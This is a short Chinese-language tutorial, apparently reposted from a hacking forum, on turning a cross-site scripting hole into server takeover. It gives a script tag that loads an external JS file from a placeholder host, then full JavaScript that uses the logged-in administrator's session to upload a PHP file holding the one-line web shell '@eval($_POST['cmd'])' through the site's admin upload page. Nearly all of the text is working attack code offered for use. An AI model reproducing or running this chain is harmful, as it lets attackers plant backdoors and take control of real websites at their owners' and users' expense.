1、找到存在xss的地方提交代码:例如:<script src=http://xxx.com/js.js></script>;

2、构造该js.

var request = false;

if(window.XMLHttpRequest) {

request = new XMLHttpRequest();

if(request.overrideMimeType) {

request.overrideMimeType('text/xml');

}

}

else if (window.ActiveXObject) {

var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];

for(var i=0; i<versions.length; i++) {

try {

request = new ActiveXObject(versions);

} catch(e) {}

}

}

xmlhttp=request;


var url= "http://www.xxx.com/admin/upload.php";//这里是上传位置 

var params="-----------------------------223972503529236\r\n"+

"Content-Disposition: form-data; name=\"title\"\r\n"+

"\r\n"+

"\r\n"+

"-----------------------------223972503529236\r\n"+

"Content-Disposition: form-data; name=\"name\"\r\n"+

"\r\n"+

"\r\n"+

"-----------------------------223972503529236\r\n"+

"Content-Disposition: form-data; name=\"file\"; filename=\"yjh.php\"\r\n"+

"Content-Type: application/octet-stream\r\n"+

"\r\n"+

"<?php @eval($_POST[\'cmd\'])?>\r\n"+

"-----------------------------223972503529236--\r\n";//这些信息可以通过本地架设后台上传点抓包获得。


xmlhttp.open("POST", url, true);

xmlhttp.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");

xmlhttp.setRequestHeader("Accept-Language", "de-de,de;q=0.8,en-us;q=0.5,en;q=0.3");

xmlhttp.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------223972503529236");

xmlhttp.withCredentials = "true";


var aBody = new Uint8Array(params.length);

        for (var i = 0; i < aBody.length; i++)

          aBody[i] = params.charCodeAt(i);

xmlhttp.send(new Blob([aBody]));   转自:F4CK